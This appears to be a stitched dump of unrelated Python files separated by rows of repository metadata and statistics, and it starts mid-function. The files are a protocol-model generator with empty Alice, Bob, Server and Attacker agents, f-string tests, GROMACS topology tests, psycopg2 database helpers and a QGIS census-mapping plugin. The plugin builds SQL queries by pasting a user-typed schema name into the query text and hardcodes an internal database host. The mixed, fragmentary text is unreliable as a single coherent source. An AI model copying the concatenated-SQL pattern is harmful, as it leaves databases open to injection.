protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_alice_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_bob(self):
agent = "Agent Bob\n"
agent += self.__create_bob_vars()
agent += self.__create_bob_actions()
agent += self.__create_bob_protocol()
agent += self.__create_bob_evolution()
agent += "end Agent\n\n"
return agent
def __create_bob_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_bob_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_bob_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_bob_protocol(self):
protocol = "\tProtocol:\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_bob_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_server(self):
agent = "Agent Server\n"
agent += self.__create_server_vars()
agent += self.__create_server_actions()
agent += self.__create_server_protocol()
agent += self.__create_server_evolution()
agent += "end Agent\n\n"
return agent
def __create_server_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_server_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_server_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_server_protocol(self):
protocol = "\tProtocol:\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_server_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_attacker(self):
agent = "Agent Attacker\n"
agent += self.__create_attacker_vars()
agent += self.__create_attacker_actions()
agent += self.__create_attacker_protocol()
agent += self.__create_attacker_evolution()
agent += "end Agent\n\n"
return agent
def __create_attacker_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_attacker_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_attacker_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_attacker_protocol(self):
protocol = "\tProtocol:\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_attacker_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_evaluation(self):
evaluation = "Evaluation\n"
evaluation += "end Evaluation\n\n"
return evaluation
def __create_init_states(self):
init_states = "InitStates\n"
init_states += ";\nend InitStates\n\n"
return init_states
def __create_groups(self):
groups = "Groups\n"
groups += "\ttrusted={Alice, Bob, Server};\n"
groups += "\tatk={Attacker};\n"
groups += "end Groups\n\n"
return groups
def __create_formulae(self):
formulae = "Formulae\n"
formulae += "\t<trusted>F keyExchanged;\n"
formulae += "\t<trusted>G !compromised;\n"
formulae += "end Formulae\n\n"
return formulae
| 39.49306 | 336 | 0.615885 | 6,508 | 59,753 | 5.38153 | 0.028888 | 0.046512 | 0.070525 | 0.0868 | 0.888645 | 0.860235 | 0.824515 | 0.786483 | 0.771008 | 0.747337 | 0 | 0.00255 | 0.278061 | 59,753 | 1,512 | 337 | 39.51918 | 0.809333 | 0.000669 | 0 | 0.835951 | 0 | 0.032286 | 0.264038 | 0.164023 | 0.004363 | 0 | 0 | 0.000661 | 0 | 1 | 0.097731 | false | 0 | 0.000873 | 0.002618 | 0.211169 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f189a3b453afb3fca1a6c8c5078894c25c96196 | 163 | py | Python | code/datasets/segmentation/__init__.py | haasj22/Recycling_Segmentation | 0420baf4c2ac2bd18b03791e123fb4b0ad7869b1 | [
"MIT"
] | 1 | 2021-03-26T00:10:17.000Z | 2021-03-26T00:10:17.000Z | code/datasets/segmentation/__init__.py | haasj22/Recycling_Segmentation | 0420baf4c2ac2bd18b03791e123fb4b0ad7869b1 | [
"MIT"
] | null | null | null | code/datasets/segmentation/__init__.py | haasj22/Recycling_Segmentation | 0420baf4c2ac2bd18b03791e123fb4b0ad7869b1 | [
"MIT"
] | null | null | null | from IIC.code.datasets.segmentation.baselines import *
from IIC.code.datasets.segmentation.cocostuff import *
from IIC.code.datasets.segmentation.potsdam import *
| 40.75 | 54 | 0.834356 | 21 | 163 | 6.47619 | 0.428571 | 0.154412 | 0.242647 | 0.419118 | 0.772059 | 0.544118 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07362 | 163 | 3 | 55 | 54.333333 | 0.900662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f309365b4b8eba88701cd7d981facb028fcecaa | 532 | py | Python | language-python-test/test/features/strings/format_string.py | wbadart/language-python | 6c048c215ff7fe4a5d5cc36ba3c17a666af74821 | [
"BSD-3-Clause"
] | null | null | null | language-python-test/test/features/strings/format_string.py | wbadart/language-python | 6c048c215ff7fe4a5d5cc36ba3c17a666af74821 | [
"BSD-3-Clause"
] | null | null | null | language-python-test/test/features/strings/format_string.py | wbadart/language-python | 6c048c215ff7fe4a5d5cc36ba3c17a666af74821 | [
"BSD-3-Clause"
] | null | null | null | f"test 'string'"
F"test 'string'"
f'test "string"'
F'test "string"'
f'''test " 'string' "'''
F'''test " 'string' "'''
f"""test ' "string" '"""
F"""test ' "string" '"""
rf"test 'string'"
RF"test 'string'"
rf'test "string"'
RF'test "string"'
rf'''test " 'string' "'''
RF'''test " 'string' "'''
rf"""test ' "string" '"""
RF"""test ' "string" '"""
fr"test 'string'"
FR"test 'string'"
fr'test "string"'
FR'test "string"'
fr'''test " 'string' "'''
FR'''test " 'string' "'''
fr"""test ' "string" '"""
FR"""test ' "string" '"""
| 14.378378 | 25 | 0.526316 | 72 | 532 | 3.888889 | 0.069444 | 0.857143 | 0.314286 | 0.457143 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.157895 | 532 | 36 | 26 | 14.777778 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0.677966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
2f7b44f950c65837153616ce56825bed6a58ff94 | 6,255 | py | Python | tophat/test_tophat.py | Yoshanuikabundi/JupyterJoy | 658f7bb0a33fdc34eb6366fae3b73d0481fd554f | [
"MIT"
] | 2 | 2018-04-27T22:52:39.000Z | 2019-04-01T15:29:17.000Z | tophat/test_tophat.py | Yoshanuikabundi/JupyterJoy | 658f7bb0a33fdc34eb6366fae3b73d0481fd554f | [
"MIT"
] | null | null | null | tophat/test_tophat.py | Yoshanuikabundi/JupyterJoy | 658f7bb0a33fdc34eb6366fae3b73d0481fd554f | [
"MIT"
] | 1 | 2019-04-01T15:29:21.000Z | 2019-04-01T15:29:21.000Z | import pytest
from .tophat import *
def test_Topology_molecules():
strlist = [
" [ system ] ",
"; this is for gmx btw",
"Test system - microbilayer!",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
top = Topology()
top.read(strlist)
compstr = '\n'.join([
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843"
])
assert str(top.molecules) == compstr
compstr = '\n'.join([
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843",
""
])
assert str(top) == compstr
top.molecules *= 10
compstr = '\n'.join([
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 10",
"protein_with_a_very_long_name 10",
"lipid_a 20",
"lipid_b 50",
"lipid_a 20",
"lipid_b 70",
"water 128430",
""
])
assert str(top) == compstr
def test_Topology_hashcommands():
strlist = [
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
" [ system ] ",
"; this is for gmx btw",
"Test system - microbilayer!",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
top = Topology()
top.read(strlist)
assert top.includes == [
'#include "./martini_v2.2refP.itp" ; comment',
"#include './martini_protein.itp'",
"#include martini_v2.0_ions.itp"
]
assert top.defines == ["#define RUBBERBANDS"]
top.includes.append('#include martini_v2.0_sugars.itp')
compstr = '\n'.join([
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"#include martini_v2.0_sugars.itp",
"",
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843",
""
])
assert str(top) == compstr
def test_Topology_system():
strlist = [
'#include "./martini_v2.2refP.itp"; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
top = Topology()
top.read(strlist)
with pytest.raises(ValueError):
str(top)
top.name = "Test system - microbilayer!"
compstr = '\n'.join([
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"",
"[ system ]",
"; name",
"Test system - microbilayer!",
"",
"[ molecules ]",
";name count",
"protein 1",
"protein_with_a_very_long_name 1",
"lipid_a 2",
"lipid_b 5",
"lipid_a 2",
"lipid_b 7",
"water 12843",
""
])
assert str(top) == compstr
strlist = [
'#include "./martini_v2.2refP.itp" ; comment',
"#define RUBBERBANDS",
"#include './martini_protein.itp'",
"",
"#include martini_v2.0_ions.itp",
"[ system ]",
"; name",
"Test system - microbilayer! - but inconsistent name",
"",
"[ molecules ] ; Molecule section time!!!",
";name ;number",
"protein 1; the protein itself",
"protein_with_a_very_long_name 1",
"lipid_a 2",
" lipid_b 5",
";lipid_c 4\n",
"lipid_a 2",
"lipid_b\t7",
"",
"water 12843;solvent!?!"
]
with pytest.raises(ValueError):
top.read(strlist)
| 29.92823 | 62 | 0.409273 | 546 | 6,255 | 4.470696 | 0.131868 | 0.114707 | 0.045883 | 0.078656 | 0.866858 | 0.855387 | 0.812782 | 0.792708 | 0.792708 | 0.792708 | 0 | 0.041469 | 0.460272 | 6,255 | 208 | 63 | 30.072115 | 0.681576 | 0 | 0 | 0.865979 | 0 | 0 | 0.565078 | 0.114487 | 0 | 0 | 0 | 0 | 0.036082 | 1 | 0.015464 | false | 0 | 0.010309 | 0 | 0.025773 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f871aad84d27e7b8dab78f5756788426b993bde | 5,622 | py | Python | psqlfunctions.py | mockinggod/Generatorbot | 502ef3b72ad841f2cd2e6ebaf8bb6655ab7c18ef | [
"MIT"
] | 7 | 2019-02-23T18:14:24.000Z | 2021-10-04T06:24:15.000Z | psqlfunctions.py | mockinggod/Generatorbot | 502ef3b72ad841f2cd2e6ebaf8bb6655ab7c18ef | [
"MIT"
] | null | null | null | psqlfunctions.py | mockinggod/Generatorbot | 502ef3b72ad841f2cd2e6ebaf8bb6655ab7c18ef | [
"MIT"
] | 2 | 2019-02-23T21:49:37.000Z | 2019-02-24T10:24:34.000Z | import psycopg2
def addprefix(serverinfo, guildid, prefix):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
postgres_insert_query = """ INSERT INTO prefixes (ID, prefix) VALUES (%s,%s)"""
record_to_insert = (guildid, prefix)
cursor.execute(postgres_insert_query, record_to_insert)
connection.commit()
count = cursor.rowcount
print (count, "Record inserted successfully into prefix table")
except (Exception, psycopg2.Error) as error :
if(connection):
print("Failed to insert record into prefix table", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def updateprefix(serverinfo, guildid, prefix):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_update_query = """Update prefixes set prefix = %s where ID = %s"""
cursor.execute(sql_update_query, (prefix, guildid))
connection.commit()
count = cursor.rowcount
print(count, "Record Updated successfully ")
except (Exception, psycopg2.Error) as error:
print("Error in update operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def readprefixes(serverinfo):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
sql_select_query = """select * from prefixes"""
cursor.execute(sql_select_query)
record = cursor.fetchall()
return(record)
except (Exception, psycopg2.Error) as error:
print("Error in update operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def removeprefix(serverinfo, guildid):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_delete_query = """Delete from prefixes where ID = %s"""
cursor.execute(sql_delete_query, (guildid, ))
connection.commit()
count = cursor.rowcount
print(count, "Record deleted successfully ")
except (Exception, psycopg2.Error) as error:
print("Error in Delete operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def addrace(serverinfo, userid, genre, race):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
postgres_insert_query = """ INSERT INTO races (ID, genre, racename, gender, weight, names, surnames, maxsettlement, occupation1, occupation2, occupation3, occupation4, occupation5, occupation6, occupation7, occupation8, occupation9, occupation10, occupation11) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"""
record_to_insert = (userid, genre, race[0], race[1], race[2], race[3], race[4], race[5], race[6][0], race[6][1], race[6][2], race[6][3], race[6][4], race[6][5], race[6][6], race[6][7], race[6][8], race[6][9], race[6][10])
cursor.execute(postgres_insert_query, record_to_insert)
connection.commit()
count = cursor.rowcount
print (count, "Record inserted successfully into races table")
except (Exception, psycopg2.Error) as error :
if(connection):
print("Failed to insert record into races table", error)
finally:
#closing database connection.
if(connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def readraces(serverinfo, userid, genre):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
if genre == 'all':
sql_select_query = """select * from races where ID = %s"""
record_to_select = ([userid])
else:
sql_select_query = """select * from races where ID = %s and genre = %s"""
record_to_select = (userid, genre)
cursor.execute(sql_select_query, record_to_select)
record = cursor.fetchall()
count = cursor.rowcount
return(count, record)
except (Exception, psycopg2.Error) as error:
print("Error in update operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def removerace(serverinfo, userid, genre, racename):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_delete_query = """Delete from races where ID = %s and genre = %s and racename = %s"""
cursor.execute(sql_delete_query, (userid, genre, racename))
count = cursor.rowcount
connection.commit()
print(count, "Record deleted successfully ")
return(count)
except (Exception, psycopg2.Error) as error:
print("Error in Delete operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed")
def removeracegenre(serverinfo, userid, genre):
try:
connection = psycopg2.connect(serverinfo)
cursor = connection.cursor()
# Update single record now
sql_delete_query = """Delete from races where ID = %s and genre = %s"""
cursor.execute(sql_delete_query, (userid, genre))
connection.commit()
count = cursor.rowcount
print(count, "Record deleted successfully ")
return(count)
except (Exception, psycopg2.Error) as error:
print("Error in Delete operation", error)
finally:
# closing database connection.
if (connection):
cursor.close()
connection.close()
print("PostgreSQL connection is closed") | 27.694581 | 331 | 0.710423 | 686 | 5,622 | 5.752187 | 0.144315 | 0.00963 | 0.012924 | 0.016219 | 0.806893 | 0.783071 | 0.751394 | 0.751394 | 0.714394 | 0.679169 | 0 | 0.012561 | 0.164532 | 5,622 | 203 | 332 | 27.694581 | 0.82755 | 0.058698 | 0 | 0.733813 | 0 | 0.007194 | 0.250899 | 0.010983 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057554 | false | 0 | 0.007194 | 0 | 0.064748 | 0.158273 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
85ed5758af7052c5fd4b8ccd5d18aa439218651b | 36,860 | py | Python | censo_segmento.py | manureta/salidagrafica-atlas | 200f1028e1c0293cbd3ac636ddc1c203e9478abc | [
"MIT"
] | null | null | null | censo_segmento.py | manureta/salidagrafica-atlas | 200f1028e1c0293cbd3ac636ddc1c203e9478abc | [
"MIT"
] | null | null | null | censo_segmento.py | manureta/salidagrafica-atlas | 200f1028e1c0293cbd3ac636ddc1c203e9478abc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
/***************************************************************************
CensoSegmento
A QGIS plugin
Censo Segmento
Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/
-------------------
begin : 2020-09-15
git sha : $Format:%H$
copyright : (C) 2020 by Maximiliano Monti
email : renzomiguelmonti@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt5.QtCore import QSettings, QTranslator, qVersion, QVersionNumber, QCoreApplication, Qt, QObject, pyqtSignal
from qgis.PyQt.QtGui import QIcon
from PyQt5.QtWidgets import QAction, QDialog, QFormLayout, QInputDialog , QLineEdit , QMessageBox
from qgis.PyQt.QtXml import QDomDocument
from qgis.utils import iface
from qgis.core import *
# Initialize Qt resources from file resources.py
from .resources import *
# Import the code for the dialog
from .censo_segmento_dialog import CensoSegmentoDialog
import os
import sys
class CensoSegmento:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgsInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value('locale/userLocale')[0:2]
locale_path = os.path.join(
self.plugin_dir,
'i18n',
'CensoSegmento_{}.qm'.format(locale))
if os.path.exists(locale_path):
self.translator = QTranslator()
self.translator.load(locale_path)
QCoreApplication.installTranslator(self.translator)
# Declare instance attributes
self.actions = []
self.menu = self.tr(u'&INDEC - CNPHyV')
# Check if plugin was started the first time in current QGIS session
# Must be set in initGui() to survive plugin reloads
self.first_start = None
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
return QCoreApplication.translate('CensoSegmento', message)
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip='Por aca puede ir la cosa',
whats_this='Que es esto',
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
# Adds plugin icon to Plugins toolbar
self.iface.addToolBarIcon(action)
if add_to_menu:
self.iface.addPluginToMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = ':/plugins/censo_segmento/icon.png'
current_dir = os.path.dirname(os.path.realpath(__file__))
poll_icon_path = os.path.join(current_dir,'icons/poll.png')
self.add_action(
poll_icon_path,
text=self.tr(u'Menu Principal'),
callback=self.run,
parent=self.iface.mainWindow())
self.add_action(
poll_icon_path,
add_to_toolbar=False,
text=self.tr(u'Plano de Fracción'),
callback=self.runFraccion,
parent=self.iface.mainWindow())
self.add_action(
poll_icon_path,
add_to_toolbar=False,
text=self.tr(u'Plano de Radio'),
callback=self.runRadio,
parent=self.iface.mainWindow())
self.add_action(
poll_icon_path,
add_to_toolbar=False,
text=self.tr(u'Plano de Segmento'),
callback=self.runSegmento,
parent=self.iface.mainWindow())
# will be set False in run()
self.first_start = True
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
for action in self.actions:
self.iface.removePluginMenu(
self.tr(u'&Censo Segmento'),
action)
self.iface.removeToolBarIcon(action)
def run(self):
"""Run method that performs all the real work"""
# Create the dialog with elements (after translation) and keep reference
# Only create GUI ONCE in callback, so that it will only load when the plugin is started
if self.first_start == True:
self.first_start = False
self.dlg = CensoSegmentoDialog()
# Events
self.dlg.buttonFraccion.clicked.connect(self.runFraccion)
self.dlg.buttonRadio.clicked.connect(self.runRadio)
self.dlg.buttonSegmento.clicked.connect(self.runSegmento)
# show the dialog
self.dlg.show()
def runRadio(self, iface):
from qgis.utils import iface
#####################################Conexion existente en el admnistrador de BD##############################################
##########Conexion desde BD a Postgis
QgsProject.instance().clear()
qs = QSettings()
dbHost = qs.value("PostgreSQL/connections/informatica/host",'10.70.80.62')
dbPort = qs.value("PostgreSQL/connections/informatica/port",'5432')
dbName = qs.value("PostgreSQL/connections/informatica/database",'DEVSEG')
############Pedir al usuario cargar los campos de usuario y contraseña
dbUsr = QInputDialog.getText(None, 'usuario', 'Introduce el nombre de usuario de la base de datos')
dbPwd = QInputDialog.getText(None, 'contraseña', 'Introduce la contraseña', QLineEdit.Password)
#####################################Conexion PostGIS##############################################
# introducimos nombre del servidor, puerto, nombre de la base de datos, usuario y contraseña
uri = QgsDataSourceUri()
uri.setConnection(dbHost,dbPort,dbName,dbUsr[0],dbPwd[0])
##############################Verificar Usuuario y Contraseña##########################################
# origen = QInputDialog.getText(None, 'origen', 'Introduce la ruta de acceso')
aglomerado = QInputDialog.getText(None, 'aglomerado', 'Introduce el nombre completo PPDDDLLL', text = 'e86154030')
origen = os.path.dirname(__file__)
# print(sys.path[0])
# print (origen)
####################### Agrego las tablas .CSV de datos geograficos############################
####### Agrego tabla provincia
capa = (origen + '/datos_prov/provincia.csv')
nomcapa = 'provincia'
layer = QgsVectorLayer(capa,nomcapa, 'ogr' )
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla departamento##################################
capa = (origen + '/datos_prov/departamentos.csv')
nomcapa = 'departamento'
layer = QgsVectorLayer(capa,nomcapa, 'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla localidad######################
capa = (origen + '/datos_prov/localidad.csv')
nomcapa = 'localidad'
layer = QgsVectorLayer(capa,nomcapa,'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
########################## Agrego todas las capas al proyecto###################################
#### agrego capa de puntitos
sql = aglomerado[0]
uri.setDataSource("", "(select r3.seg, r3.viviendas, r3.descripcion, concat(prov,lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'),lpad(r3.frac::text,2,'0'),lpad(r3.radio::text,2,'0'),seg) link, coalesce(st_collect(l.wkb_geometry_lado),st_makeline(st_point(0,0), st_point(1,1))) geolado, coalesce(st_collect(l.wkb_geometry),st_point(0,0)) geom from " + sql + ".r3 " +" join "+ sql+".segmentacion s on r3.segmento_id=s.segmento_id" + " join "+ sql + ".listado_geo l on l.id_list = s.listado_id group by r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio)","geom","", "link")
layer = QgsVectorLayer(uri.uri(), "Listado_viv", "postgres")
if not layer.isValid():
print ("No se cargo capa Listado")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/listado.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########################### Agregar plantillas de salida##############
#### Plantilla tamaño A4 ###############
pry= QgsProject.instance()
#Añadi una verificación de la ruta del archivo qtp
####### Agrego la capa Segmento
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "Segmentacion", "postgres")
if not layer.isValid():
print ("No se cargo capa Segmento")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_radio/segmentos.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########Agrego la capa Mascara
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Mascara","postgres")
if not vlayer.isValid():
print ("No se cargola capa Mascara ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_radio/mascara.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
#######Agrego la capa Especiales
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "CodEspeciales", "postgres")
if not layer.isValid():
print ("No se cargo capa Codigos Especiales")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_radio/especiales.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
####### Agrego la capa Radios desde BD
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Radio","postgres")
if not vlayer.isValid():
print ("No se cargo la capa Radio ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_radio/pradio.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
####### Agrego la capa Etiquetas Manzanas
uri.setDataSource(aglomerado[0] , "lab" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "Etiqueta_manzana", "postgres")
if not layer.isValid():
print ("No se cargo capa Etiquetas manzanas")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/manzanas.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
############################# Agrego la capa Descripcion ###########################
sql = aglomerado[0]
